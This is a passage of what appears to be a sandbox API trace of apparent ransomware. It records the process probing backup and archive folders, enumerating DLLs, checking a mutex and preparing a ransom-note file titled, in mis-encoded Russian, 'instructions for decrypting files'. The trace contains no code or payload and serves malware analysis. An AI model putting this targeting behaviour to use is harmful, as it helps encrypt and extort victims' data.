files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.053] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=8, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\\x10") returned 8 [0104.053] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=37, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\") returned 37 [0104.053] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@庤W企@\x18儼W\x18j")) returned 0xffffffff [0104.055] GetLastError () returned 0x2 [0104.055] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.055] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=37, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\") returned 37 [0104.056] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=6, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\") returned 6 [0104.056] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Adobe", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@鳜W企@\x18㟄X\x18q")) returned 0xffffffff [0104.060] GetLastError () returned 0x2 [0104.061] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.061] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=6, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="adobe\\儸WP") returned 6 [0104.061] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=7, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\") returned 7 [0104.061] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Oracle", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@巬W企@\x18㤄X\x18y")) returned 0xffffffff [0104.063] GetLastError () returned 0x2 [0104.063] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=7, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="oracle\\X\x10") returned 7 [0104.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=7, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\") returned 7 [0104.064] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Archive", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@鳜W企@\x18㟄X\x18\x81")) returned 0xffffffff [0104.065] GetLastError () returned 0x2 [0104.066] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=7, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="archiveX\x10") returned 7 [0104.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=6, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\") returned 6 [0104.066] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Backup", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@巬W企@\x18㤄X\x18\x88")) returned 0xffffffff [0104.068] GetLastError () returned 0x2 [0104.068] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.068] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=6, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="backup㟀X\x10") returned 6 [0104.069] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=6, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\") returned 6 [0104.069] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Reserv", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@鳜W企@\x18㟄X\x18\x8f")) returned 0xffffffff [0104.071] GetLastError () returned 0x2 [0104.072] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.072] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=6, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="reserv㤀X\x10") returned 6 [0104.072] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=7, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\") returned 7 [0104.072] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Restore", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@巬W企@\x18㤄X\x18\x97")) returned 0xffffffff [0104.076] GetLastError () returned 0x2 [0104.076] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.076] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=7, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="restoreX\x10") returned 7 [0104.076] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.076] SHGetMalloc (in: ppMalloc=0x18f118 | out: ppMalloc=0x18f118*=0x767666bc) returned 0x0 [0104.077] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18f114 | out: ppidl=0x18f114) returned 0x0 [0104.077] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.078] SysReAllocStringLen (in: pbstr=0x18f19c*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18f19c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.078] IMalloc:Free (This=0x767666bc, pv=0x578208) [0104.078] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0104.078] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0104.078] GlobalLock (hMem=0x450004) returned 0x588000 [0104.078] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.078] GlobalUnlock (hMem=0x450004) returned 0 [0104.078] GlobalLock (hMem=0x450004) returned 0x588000 [0104.078] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.078] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.078] GlobalUnlock (hMem=0x450004) returned 0 [0104.078] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.078] GlobalUnlock (hMem=0x45000c) returned 0 [0104.079] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*", lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575030 [0104.080] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.080] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0104.080] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab6f770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x8b840, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceca35.dll", cAlternateFileName="SQLCEC~1.DLL")) returned 1 [0104.080] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f114 | out: lpLocalFileTime=0x18f114) returned 1 [0104.080] FileTimeToDosDateTime (in: lpFileTime=0x18f114, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.080] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.080] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.080] GlobalUnlock (hMem=0x45000c) returned 0 [0104.080] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.080] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.080] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.080] GlobalUnlock (hMem=0x45000c) returned 0 [0104.080] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.080] GlobalUnlock (hMem=0x450004) returned 0 [0104.080] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.081] CharLowerBuffW (in: lpsz="sqlceca35.dll", cchLength=0xd | out: lpsz="sqlceca35.dll") returned 0xd [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="añ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.081] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18e0b0, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceca35.dll", cchWideChar=72, lpMultiByteStr=0x18e08c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceca35.dllè", lpUsedDefaultChar=0x0) returned 72 [0104.082] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0104.082] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18e0b0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllmpact Edition\\v3.5\\sqlceca35.dllè", lpUsedDefaultChar=0x0) returned 4 [0104.082] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x1d040, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcecompact35.dll", cAlternateFileName="SQLCEC~2.DLL")) returned 1 [0104.082] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.082] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.082] GlobalLock (hMem=0x450004) returned 0x588000 [0104.082] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.082] GlobalUnlock (hMem=0x450004) returned 0 [0104.082] GlobalLock (hMem=0x450004) returned 0x588000 [0104.082] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.082] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.082] GlobalUnlock (hMem=0x450004) returned 0 [0104.082] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.082] GlobalUnlock (hMem=0x45000c) returned 0 [0104.082] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.083] CharLowerBuffW (in: lpsz="sqlcecompact35.dll", cchLength=0x12 | out: lpsz="sqlcecompact35.dll") returned 0x12 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="añ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.084] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=36, lpWideCharStr=0x18e0b0, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.084] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program 